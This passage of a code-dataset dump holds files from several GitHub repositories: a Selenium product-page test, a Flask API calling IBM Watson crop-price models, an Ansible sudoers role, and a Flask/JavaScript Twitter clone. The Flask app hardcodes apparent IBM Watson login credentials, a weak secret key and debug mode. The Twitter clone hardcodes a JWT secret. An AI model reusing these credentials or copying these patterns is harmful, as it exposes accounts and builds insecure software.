"language": "Python",
"length_bytes": 1808,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 26,
"path": "/test_product_page.py",
"repo_name": "Stalnyetapki/pattern_application_Page_Object",
"src_encoding": "UTF-8",
"text": "from .pages.product_page import ProductPage\nimport pytest\n\n\nlink = \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\n\n\[email protected]('link', [\"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer0\",\n \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer1\",\n \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer2\",\n \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer3\",\n \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer4\",\n \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer5\",\n \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer6\",\n \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer7\",\n \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer8\",\n \"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/?promo=offer9\"])\ndef test_guest_can_add_product_to_cart(driver, link):\n product_page = ProductPage(driver, link)\n product_page.open()\n product_page.take_product_name()\n product_page.take_product_price()\n product_page.press_button_add_in_basket()\n product_page.solve_quiz_and_get_code()\n product_page.should_be_product_name_in_adding_message(name=product_page.take_product_name())\n product_page.should_be_price_of_product_in_basket_value(price=product_page.take_product_price())\n\n\n\n"
}
] | 5 |
ahmedkmadani/WatsonAPI
|
https://github.com/ahmedkmadani/WatsonAPI
|
3d781ffffacbf6bc908744901ad5e450533cf366
|
09a64700f0f4b0a4501c7d9689d85e051f7e1de5
|
c88378579e3a14e6cefd2587cd2e746e4aab9541
|
refs/heads/master
| 2021-06-12T09:23:18.253989 | 2019-06-27T13:06:16 | 2019-06-27T13:06:16 | 188,440,083 | 0 | 0 |
Apache-2.0
| 2019-05-24T14:52:54 | 2019-06-27T13:06:56 | 2021-06-01T23:46:52 |
Python
|
[
{
"alpha_fraction": 0.8058252334594727,
"alphanum_fraction": 0.8058252334594727,
"avg_line_length": 50.5,
"blob_id": "7416dd73890fb42d3f5e74379b50c12eb8f93745",
"content_id": "27eb8a36671a534ec640e975931a33eaadbc5419",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 103,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ahmedkmadani/WatsonAPI",
"src_encoding": "UTF-8",
"text": "# WatsonAPI\nFlask API to get price from IBM watson to predict yam price after inserting Month and year\n"
},
{
"alpha_fraction": 0.4956521689891815,
"alphanum_fraction": 0.7043478488922119,
"avg_line_length": 15.571428298950195,
"blob_id": "3be7b1672995a41be3bf8e2c9d7f1b75370925eb",
"content_id": "4188f3a78b8ef76bd81aa210c1c3722f3ead2a31",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 115,
"license_type": "permissive",
"max_line_length": 18,
"num_lines": 7,
"path": "/requirements.txt",
"repo_name": "ahmedkmadani/WatsonAPI",
"src_encoding": "UTF-8",
"text": "Flask==1.0.2\nFrozen-Flask==0.15\ngunicorn==19.0.0\nurllib3==1.22\njsonschema==3.0.1\nrequests==2.18.4\nFlask-Cors==3.0.7"
},
{
"alpha_fraction": 0.6362301111221313,
"alphanum_fraction": 0.6780905723571777,
"avg_line_length": 39.05882263183594,
"blob_id": "8ea1a4353a867cc59de62bc914ab58c4d30f75d8",
"content_id": "fe78c03ba4ef7162f7b775ab7b6b1f53d42fd28b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4085,
"license_type": "permissive",
"max_line_length": 218,
"num_lines": 102,
"path": "/app.py",
"repo_name": "ahmedkmadani/WatsonAPI",
"src_encoding": "UTF-8",
"text": "#Price Model Predection using IBM Watson\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS\nimport urllib3, json, requests, calendar\n\napp = Flask(__name__)\nCORS(app)\n\n#IBM Watson Credenials \nwml_credentials={\n \"url\":'https://eu-gb.ml.cloud.ibm.com',\n \"username\": '461336f2-8984-492a-b72a-9376b8e9d1c2',\n \"password\": 'de3136e2-2a65-48cd-85f7-77dd03715ba3'\n }\n\n#init header and request and getting response \nheaders = urllib3.util.make_headers(basic_auth='{username}:{password}'.format(username=wml_credentials['username'], password=wml_credentials['password']))\nurl = '{}/v3/identity/token'.format(wml_credentials['url'])\nresponse = requests.get(url, headers=headers)\nmltoken = json.loads(response.text).get('token')\n\nheader = {'Content-Type': 'application/json', 'Authorization': 'Bearer ' + mltoken}\n\[email protected]('/price/v1', methods=['GET', 'POST'])\ndef getPrice():\n #getting month and year from POST request\n month = request.args.get('month')\n year = request.args.get('year')\n\n payload_scoring = {\"fields\":[\"MONTH\",\"YEAR\"],\"values\":[[int(month),int(year)]]}\n response_scoring = requests.post('https://eu-gb.ml.cloud.ibm.com/v3/wml_instances/6a216236-adcc-48b5-901f-41e4cafbf033/deployments/1d441776-58fb-4e22-8975-aa9b1c4a40a9/online', json=payload_scoring, headers=header)\n print(\"Scoring response\")\n print(json.loads(response_scoring.text)) \n response = json.loads(response_scoring.text)\n\n #get result from the response \n month_num = int(response['values'][0][0])\n month = calendar.month_name[month_num]\n year = str(response['values'][0][1])\n pre_prams = str(response['values'][0][2])\n price_round = (\"%.2f\" % round(response['values'][0][3],2))\n price = str(price_round + \" GHS (250KG)\")\n\n return jsonify(month=month,year=year,pre_prams=pre_prams,price=price)\n\n\n\[email protected]('/price/v2', methods=['GET', 'POST'])\ndef getPriceV2():\n #getting month and year from POST request\n month = request.args.get('month')\n year = request.args.get('year')\n temp = request.args.get('temp')\n rain = request.args.get('rain')\n\n payload_scoring = {\"fields\":[\"MONTH\",\"YEAR\",\"TEMP\",\"Rainfall - (MM)\"],\"values\":[[int(month),int(year),float(temp),float(rain)]]}\n\n response_scoring = requests.post('https://eu-gb.ml.cloud.ibm.com/v3/wml_instances/6a216236-adcc-48b5-901f-41e4cafbf033/deployments/dab8060f-b1f4-49d7-bd69-8ca833cc2d3d/online', json=payload_scoring, headers=header)\n print(\"Scoring response\")\n print(json.loads(response_scoring.text))\n response = json.loads(response_scoring.text)\n\n #get result from the response \n month_num = int(response['values'][0][0])\n month = calendar.month_name[month_num]\n year = str(response['values'][0][1])\n pre_prams = str(response['values'][0][2])\n price_round = (\"%.2f\" % round(response['values'][0][3],2))\n price = str(price_round + \" GHS\")\n\n return jsonify(month=month,year=year,pre_prams=pre_prams,price=price)\n\n\n\[email protected]('/price/v3', methods=['GET', 'POST'])\ndef getPriceV3():\n #getting crop , month and year from POST request\n month = request.args.get('month')\n year = request.args.get('year')\n crop = request.args.get('crop')\n\n\n payload_scoring = {\"fields\":[\"YEAR\",\"MONTH\",\"CROP\"],\"values\":[[int(year),int(month),int(crop)]]}\n response_scoring = requests.post('https://eu-gb.ml.cloud.ibm.com/v3/wml_instances/6a216236-adcc-48b5-901f-41e4cafbf033/deployments/a4263b57-a6f0-4592-83ac-68f2625647f3/online', json=payload_scoring, headers=header)\n print(\"Scoring response\")\n print(json.loads(response_scoring.text)) \n response = json.loads(response_scoring.text)\n\n # get result from the response \n year = int(response['values'][0][0])\n month_num = int(response['values'][0][1])\n month = calendar.month_name[month_num]\n crop = int(response['values'][0][2])\n price_round = (\"%.2f\" % round(response['values'][0][4]))\n price = str(price_round + \" GHS\")\n\n # return str(response)\n return jsonify(month=month,year=year,price=price,crop=crop)\n\nif __name__ == '__main__':\n app.secret_key='secret123'\n app.run(debug=True)"
}
] | 3 |
mongodb-ansible-roles/ansible-role-sudoers-d
|
https://github.com/mongodb-ansible-roles/ansible-role-sudoers-d
|
f599fa5356f939984e19c9a6df8bda4605af927d
|
8e23a5165f6ab528a26554746aee658cefee9159
|
720e997bf4d32457ec792dcaf76a8502bef470d9
|
refs/heads/master
| 2021-01-08T07:31:30.027241 | 2020-02-20T18:48:12 | 2020-02-20T18:48:12 | 241,956,675 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7322834730148315,
"alphanum_fraction": 0.7322834730148315,
"avg_line_length": 20.16666603088379,
"blob_id": "92e129df28bb1ac77c957c62f20e31e1e00ff35c",
"content_id": "e5814478880d6f25ee2ee280dc8e8402d8713da9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 254,
"license_type": "permissive",
"max_line_length": 63,
"num_lines": 12,
"path": "/molecule/default/tests/test_default.py",
"repo_name": "mongodb-ansible-roles/ansible-role-sudoers-d",
"src_encoding": "UTF-8",
"text": "import os\n\nimport testinfra.utils.ansible_runner\n\ntestinfra_hosts = testinfra.utils.ansible_runner.AnsibleRunner(\n os.environ['MOLECULE_INVENTORY_FILE']\n).get_hosts('all')\n\n\ndef test_sudo(host):\n cmd = host.run(\"sudo pwd\")\n assert cmd.succeeded\n"
},
{
"alpha_fraction": 0.5903361439704895,
"alphanum_fraction": 0.7584033608436584,
"avg_line_length": 35.61538314819336,
"blob_id": "3a84edd71a97c7fa68388a0ee91f92ce20be9178",
"content_id": "edad9c9d91fa8d38cef461c1747bf07642d3a57d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 476,
"license_type": "permissive",
"max_line_length": 165,
"num_lines": 13,
"path": "/CHANGELOG.md",
"repo_name": "mongodb-ansible-roles/ansible-role-sudoers-d",
"src_encoding": "UTF-8",
"text": "## [1.0.1](https://github.com/mongodb-ansible-roles/ansible-role-sudoers-d/compare/v1.0.0...v1.0.1) (2020-02-20)\n\n\n### Bug Fixes\n\n* Added missing RHEL network signon step ([a203915](https://github.com/mongodb-ansible-roles/ansible-role-sudoers-d/commit/a20391546a2dea2b4abe83aaef30f11baf034c9d))\n\n# 1.0.0 (2020-02-20)\n\n\n### Features\n\n* Initial commit ([f869dcf](https://github.com/mongodb-ansible-roles/ansible-role-sudoers-d/commit/f869dcf64f4c73cdbe79c880c9067f208dab10bc))\n"
},
{
"alpha_fraction": 0.6105726957321167,
"alphanum_fraction": 0.6211453676223755,
"avg_line_length": 25.395349502563477,
"blob_id": "68a3d2503467aef80f6c9a18a5ec1a4508ba384d",
"content_id": "4821c1832bc6c56099b44c9722542caa4e7cf263",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1135,
"license_type": "permissive",
"max_line_length": 230,
"num_lines": 43,
"path": "/README.md",
"repo_name": "mongodb-ansible-roles/ansible-role-sudoers-d",
"src_encoding": "UTF-8",
"text": "Ansible role for sudoers-d\n==================================\n\nAdd entries to sudoers drop in directory\n\n[](https://github.com/mongodb-ansible-roles/ansible-role-sudoers-d/actions?query=workflow%3A%22Molecule+Test%22)\n[](https://github.com/mongodb-ansible-roles/ansible-role-sudoers-d/actions?query=workflow%3A%22Release%22)\n\nRequirements\n------------\n\nNone\n\nRole Variables\n--------------\n\n| Name | Description | Type | Default | Required |\n|------|-------------|:----:|:-------:|:--------:|\n| `sudoers_commands` | Array of files to add to /etc/sudoers.d/ directory | array | \"\" | yes |\n\nDependencies\n------------\n\nNone\n\nExample Playbook\n----------------\n\n```yaml\n- hosts: all\n roles:\n - role: ansible-role-sudoers-d\n vars:\n sudoers_commands:\n - user: test_user\n commands: /usr/bin/pwd\n dest: /etc/sudoers.d/pwd\n```\n\nLicense\n-------\n\n[Apache License](LICENSE)\n"
}
] | 3 |
wishabhilash/mhtwitter
|
https://github.com/wishabhilash/mhtwitter
|
2a5023d661335d8bcd12bd77e2df39e42576f332
|
05761833ca0268ca43a98f03180c5739f12503a7
|
91089d081ed10a2c780e294bbe2911b48d39a4b5
|
refs/heads/master
| 2020-04-01T18:49:16.717505 | 2018-10-21T17:46:07 | 2018-10-21T17:46:07 | 153,516,634 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.580471396446228,
"alphanum_fraction": 0.5878787636756897,
"avg_line_length": 26,
"blob_id": "b95b902bfdd2854716386390e2bd244af8d33762",
"content_id": "977086435888f92674472167cc3a0e6ba15a6cd0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1485,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 55,
"path": "/src/ui/js/views.js",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "'use strict';\nimport {UserService, TweetService, FollowerService} from \"/asset/js/services.js\";\n\nexport default class DefaultView {\n constructor(oid) {\n this.userService = new UserService();\n this.tweetService = new TweetService();\n this.followerService = new FollowerService();\n\n this.accessToken = localStorage.getItem('accessToken', null);\n if (!this.accessToken) {\n this.goToSignin();\n }\n\n if (oid == undefined) {\n oid = this.parseJwt(this.getAccessToken()).identity;\n }\n\n this._setupView(oid)\n }\n\n getAccessToken() {\n return this.accessToken;\n }\n\n _setupView(oid) {\n // TO BE IMPLEMENTED\n }\n\n _setupUserProfile(data) {\n $('.header .name h4').html(`<a href=\"/user/${data.oid}\">${data.name.toUpperCase()}</a>`)\n $('.header .email h6').html(data.email)\n }\n\n _setupUserSuggestions(data) {\n let userSuggestions = this._renderUserCell(data);\n $('.user-suggestions .users-list').html(userSuggestions);\n }\n\n parseJwt (token) {\n var base64Url = token.split('.')[1];\n var base64 = base64Url.replace('-', '+').replace('_', '/');\n return JSON.parse(window.atob(base64));\n };\n\n goToSignin() {\n window.location = \"/?show=signin\";\n }\n\n getSignedInUserOid() {\n this.accessToken = localStorage.getItem('accessToken', null);\n return this.parseJwt(this.accessToken).identity;\n }\n\n}\n"
},
{
"alpha_fraction": 0.550148606300354,
"alphanum_fraction": 0.5557206273078918,
"avg_line_length": 33.52564239501953,
"blob_id": "45f654cfd4c8f80835690644c29bbae47491e762",
"content_id": "386bff2bf54f8d1b43824e2516d0a3e4ab12fd99",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2692,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 78,
"path": "/src/views/follower.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src.views.base import BaseView\nfrom src import models\nfrom flask import request\nfrom flask_jwt_extended import jwt_required\n\nclass Follower(BaseView):\n\n @jwt_required\n def get(self, oid):\n return self._get_followers_of_user(oid)\n\n def _get_followers_of_user(self, oid):\n user = models.User().get_by_oid(oid)\n if user is None:\n return self._404(\"User doesn't exist.\")\n\n followers = models.Follower().get_by_user(user)\n result = []\n for follower in followers:\n result.append({\n 'name': follower.follower.name,\n 'email': follower.follower.email,\n 'oid': follower.follower.oid\n })\n return self._success(result)\n\n @jwt_required\n def post(self):\n args = request.form\n if not ('leader_oid' in args and 'follower_oid' in args):\n return self._404(\"Invalid data.\") \n return self._create_follower(args)\n\n def _create_follower(self, args):\n if args['leader_oid'] == args['follower_oid']:\n return self._404(\"User can't follow ownself.\")\n \n leader_user = models.User().get_by_oid(args['leader_oid'])\n follower_user = models.User().get_by_oid(args['follower_oid'])\n \n followerObj = models.Follower()\n followerExists = followerObj.query.filter(\n models.Follower.leader==leader_user,\n models.Follower.follower==follower_user\n ).all()\n if not followerExists:\n follower = models.Follower().create_follower(args['leader_oid'], args['follower_oid'])\n return self._success()\n else:\n return self._404(\"User is already a follower\")\n\n\nclass FollowerTweets(BaseView):\n\n @jwt_required\n def get(self, oid):\n return self._get_tweets_of_followers(oid)\n\n def _get_tweets_of_followers(self, oid):\n user = models.User().get_by_oid(oid)\n if user is None:\n return self._404(\"User doesn't exist.\")\n\n followers = models.Follower().get_by_user(user)\n tweets = []\n for follower in followers:\n for tweet in follower.follower.tweets:\n tweets.append({\n 'created_at': tweet.created_at,\n 'tweet': tweet.tweet,\n 'oid': tweet.oid,\n 'follower': {\n 'name': follower.follower.name,\n 'email': follower.follower.email,\n 'oid': follower.follower.oid\n }\n })\n return self._success(list(reversed(sorted(tweets, key=lambda x: x['created_at']))))"
},
{
"alpha_fraction": 0.6881029009819031,
"alphanum_fraction": 0.6881029009819031,
"avg_line_length": 37.875,
"blob_id": "76f4a3c1a1b43039c8232db236846ad7f624f106",
"content_id": "478e4f3760d613a8fdd6d762dfc7ba64b2de4ee8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 933,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 24,
"path": "/src/models/follower.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src import db, app\nfrom src.models.base import BaseModel\nfrom sqlalchemy.orm import validates, relationship\nfrom sqlalchemy.ext.hybrid import hybrid_property\nfrom src import models\n\nclass Follower(BaseModel, db.Model):\n leader_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n follower_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n\n leader = relationship('User', foreign_keys=[leader_id])\n follower = relationship('User', foreign_keys=[follower_id])\n\n def get_by_user(self, user):\n followers = self.query.filter(Follower.leader_id == user.id).all()\n return followers\n \n def create_follower(self, leader_oid, follower_oid):\n leader = models.User().get_by_oid(leader_oid)\n follower = models.User().get_by_oid(follower_oid)\n self.leader_id = leader.id\n self.follower_id = follower.id\n self.save()\n return self\n"
},
{
"alpha_fraction": 0.6127167344093323,
"alphanum_fraction": 0.6242774724960327,
"avg_line_length": 25,
"blob_id": "7b2b29af52632ecd1080c7a5cf30cdce99f19823",
"content_id": "238b626c2eb80bc7a25fbbbc9d442916b22f04b8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 519,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 20,
"path": "/src/settings.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "import sys, os\n\n\nclass Config(object):\n BASE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n SQLALCHEMY_DATABASE_URI = \"sqlite:///%s/twitter.sqlite\" % BASE_PATH\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n\n TWEET_CHARACTER_LIMIT = 280\n ACCESS_TOKEN_EXPIRY = 7 #days\n REFRESH_TOKEN_EXPIRY = 30 #days\n\n JWT_SECRET_KEY = \"$6$DXKKMwci96tYMW3C\"\n\n\n DATETIME_FORMAT = \"%Y-%m-%dT%H:%M:%S\"\n DATE_FORMAT = \"%Y-%m-%d\"\n TIME_FORMAT = \"%H:%M:%S\"\n\n STATIC_PATH = os.path.join(BASE_PATH, 'src', 'ui')"
},
{
"alpha_fraction": 0.5254386067390442,
"alphanum_fraction": 0.530701756477356,
"avg_line_length": 29.594594955444336,
"blob_id": "0844978f0b164593ceed43d2d2fc9bdd2befa7b0",
"content_id": "b65893979f91e0df6843f2599531c298db526659",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1140,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 37,
"path": "/src/views/tweet.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src.views.base import BaseView\nfrom src import models\nfrom flask import request\nfrom flask_jwt_extended import jwt_required\n\nclass Tweet(BaseView):\n\n @jwt_required\n def get(self, oid):\n return self._get_tweets_of_user(oid)\n\n def _get_tweets_of_user(self, oid):\n user = models.User().get_by_oid(oid)\n tweets = []\n if user.tweets is not None:\n for t in user.tweets:\n tweets.append({\n 'created_at': t.created_at,\n 'tweet': t.tweet,\n 'oid': t.oid,\n 'name': user.name,\n 'email': user.email\n })\n return self._success(list(reversed(tweets)))\n\n @jwt_required\n def post(self):\n args = request.form\n user = models.User().get_by_oid(args['oid'])\n if user is None:\n return self._404(\"User doesn't exist.\")\n tweet = models.Tweet(user, args['content'])\n try:\n tweet.save()\n except Exception as e:\n return self._404('Encountered error while saving')\n return self._success()\n "
},
{
"alpha_fraction": 0.5104477405548096,
"alphanum_fraction": 0.5104477405548096,
"avg_line_length": 22.769229888916016,
"blob_id": "2478db0fcfe37c8670ab43a97471ff669474c2f6",
"content_id": "0be0e1d8d1fd5b5f91b74c72a4b8d4ed7ebadbc4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 335,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 13,
"path": "/src/views/__init__.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "import os\nfrom src import app\n\nclass StaticMixin(object):\n \n def _get_file(self, filepath):\n content = \"\"\n try:\n content = open(os.path.join(app.config['STATIC_PATH'], filepath)).read()\n except Exception as e:\n print(e)\n pass\n return content\n \n \n "
},
{
"alpha_fraction": 0.7542856931686401,
"alphanum_fraction": 0.7599999904632568,
"avg_line_length": 16.600000381469727,
"blob_id": "53313c991bab403a7f63018ed4d1b20ea7abc422",
"content_id": "2da9c76a91b1aab4b986508424b20bf01e23df18",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 175,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 10,
"path": "/deploy.sh",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# Create python virtual environment\nvirtualenv --python=python3 .venv\n. .venv/bin/activate\n# END\n\n# Install requirements.txt\npip install -r requirements.txt\n# END"
},
{
"alpha_fraction": 0.7217391133308411,
"alphanum_fraction": 0.7217391133308411,
"avg_line_length": 15.428571701049805,
"blob_id": "d225e96aabc36272a291069c616c5d1a3f57657a",
"content_id": "3072d2dbbb80a6dbf2b1f95b9bf810467f2a1bba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 115,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 7,
"path": "/src/commands.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src import app, db\nimport click\nfrom src.models import *\n\[email protected]()\ndef createdb():\n\tdb.create_all()\n"
},
{
"alpha_fraction": 0.575129508972168,
"alphanum_fraction": 0.590673565864563,
"avg_line_length": 28,
"blob_id": "3695b71e926c5b1fb1766eb02003113a797fbe7a",
"content_id": "b1eb6710496c762ac5c7fa492266f74ce3d43388",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 579,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 20,
"path": "/src/views/base.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from flask.views import MethodView\nfrom flask import jsonify\nfrom datetime import datetime\nfrom src import app\n\nclass BaseView(MethodView):\n \n def _404(self, message):\n return jsonify({\n 'status': 'error',\n 'message': message,\n 'timestamp': datetime.utcnow().strftime(app.config['DATETIME_FORMAT'])\n }), 404\n\n def _success(self, data=None):\n return jsonify({\n 'status': 'success',\n 'data': data,\n 'timestamp': datetime.utcnow().strftime(app.config['DATETIME_FORMAT'])\n }), 200"
},
{
"alpha_fraction": 0.7872340679168701,
"alphanum_fraction": 0.7872340679168701,
"avg_line_length": 30.66666603088379,
"blob_id": "daf3c3dd5c01a7f0272e001b069246f448848d7b",
"content_id": "3d7be37d743d770ac7c715d4a74e4f6b14b523c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 94,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 3,
"path": "/src/models/__init__.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src.models.user import *\nfrom src.models.tweet import *\nfrom src.models.follower import *"
},
{
"alpha_fraction": 0.6791045069694519,
"alphanum_fraction": 0.6815920472145081,
"avg_line_length": 31.200000762939453,
"blob_id": "b5adec1e19f32a59577714a088e627754a3f4011",
"content_id": "050d412ce9001b98f368a496b93f7a3246c4329d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 804,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 25,
"path": "/src/models/base.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src import db, app\nfrom datetime import datetime\nfrom sqlalchemy.ext.hybrid import hybrid_property\nimport uuid\n\nclass BaseModel(object):\n id = db.Column(db.Integer, primary_key=True)\n oid = db.Column(db.String, nullable=False, default=str(uuid.uuid1()), unique=True)\n _created_at = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n _modified_at = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n\n def __init__(self):\n self.oid = str(uuid.uuid1())\n\n def save(self):\n db.session.add(self)\n db.session.commit()\n\n @hybrid_property\n def created_at(self):\n return self._created_at.strftime(app.config['DATETIME_FORMAT'])\n\n @created_at.setter\n def created_at(self, _created_at):\n self._created_at = _created_at"
},
{
"alpha_fraction": 0.5272727012634277,
"alphanum_fraction": 0.5398601293563843,
"avg_line_length": 18.351350784301758,
"blob_id": "e649d3fdc416f91c6a8b8649420528b9f6733fdc",
"content_id": "c86e8fa279eb1b278dbd895b8121cd483bd588d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 715,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 37,
"path": "/src/ui/js/components/base.js",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "'use strict';\n\nexport default class BaseComponent {\n constructor(tagName) {\n this.tagName = tagName;\n\n }\n\n run() {\n if (this.tagName == undefined) {\n throw \"tagName is undefined.\";\n }\n $(this.tagName).html(this._render());\n this._bindEvents();\n }\n\n _render() {\n\n }\n\n _bindEvents() {\n\n }\n\n _parseJwt (token) {\n var base64Url = token.split('.')[1];\n var base64 = base64Url.replace('-', '+').replace('_', '/');\n return JSON.parse(window.atob(base64));\n }\n\n _getSignedInUserOid() {\n this.accessToken = localStorage.getItem('accessToken', null);\n return this._parseJwt(this.accessToken).identity;\n }\n\n\n}"
},
{
"alpha_fraction": 0.5091836452484131,
"alphanum_fraction": 0.518367350101471,
"avg_line_length": 24.763158798217773,
"blob_id": "2c433268286b1ead026d723f8be1a3604bbea88f",
"content_id": "565a934abb84259472dd16db3457fc92d3d0b80b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 980,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 38,
"path": "/src/views/user.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "from src.views.base import BaseView\nfrom src import models\nfrom flask import request\nfrom flask_jwt_extended import jwt_required\n\nclass User(BaseView):\n\n @jwt_required\n def get(self, oid=None):\n if oid is None:\n return self._get_users()\n else:\n return self._get_user(oid)\n\n def _get_user(self, oid):\n user = models.User().get_by_oid(oid)\n if user is None:\n return self._404(\"User doesn't exist.\")\n\n return self._success({\n 'oid': user.oid,\n 'name': user.name,\n 'email': user.email\n })\n\n def _get_users(self):\n users = models.User().query.all()[:100]\n if not users:\n return self._404(\"No users found.\")\n\n result = []\n for user in users:\n result.append({\n 'oid': user.oid,\n 'name': user.name,\n 'email': user.email\n })\n return self._success(result)\n\n"
},
{
"alpha_fraction": 0.7439024448394775,
"alphanum_fraction": 0.7439024448394775,
"avg_line_length": 29.875,
"blob_id": "46ae1a87741349c4b9ca7845a1d1f7da5e33cbf9",
"content_id": "6caa71c635c51389a4477750bbaee41185944d93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 246,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 8,
"path": "/src/run.py",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "import sys, os\n# Load project into system path\n# so that all the modules can be called\n# from the root of the project.\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nfrom src.urls import *\nfrom src.commands import *"
},
{
"alpha_fraction": 0.5092838406562805,
"alphanum_fraction": 0.510079562664032,
"avg_line_length": 23.019107818603516,
"blob_id": "dd231b3a15217e59fb84fe35cde549416166dd24",
"content_id": "ea0c9333d12e1f1009960e97febb3b825019b6a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3770,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 157,
"path": "/src/ui/js/index.js",
"repo_name": "wishabhilash/mhtwitter",
"src_encoding": "UTF-8",
"text": "'use strict';\n\n\nclass Auth {\n\n constructor() {\n this.authService = new AuthService();\n this.accessToken = localStorage.getItem('accessToken', null);\n this.refreshToken = localStorage.getItem('refreshToken', null);\n \n // Check if accessToken is valid and if valid login user\n this._autoSignin()\n }\n\n _autoSignin() {\n let self = this;\n self.validateAccessToken()\n .then(function(data){\n self._goToHome()\n }).catch(function(err){\n console.log(err);\n });\n }\n\n _setAccessToken (accessToken) {\n localStorage.setItem('accessToken', accessToken);\n }\n\n _setRefreshToken (refreshToken) {\n localStorage.setItem('refreshToken', refreshToken);\n }\n\n _getAccessToken (accessToken) {\n return localStorage.getItem('accessToken', null);\n }\n\n _getRefreshToken (refreshToken) {\n return localStorage.getItem('refreshToken', null);\n }\n\n signin() {\n let self = this;\n \n self._fetchTokens()\n .then(function(data){\n self._goToHome();\n }).catch(function(e) {\n console.log(e);\n })\n }\n\n validateAccessToken() {\n let accessToken = this._getAccessToken()\n return this.authService.validateAccessToken(accessToken);\n }\n\n _fetchTokens() {\n let self = this;\n let email = $('.signin-email input').val();\n let password = $('.signin-password 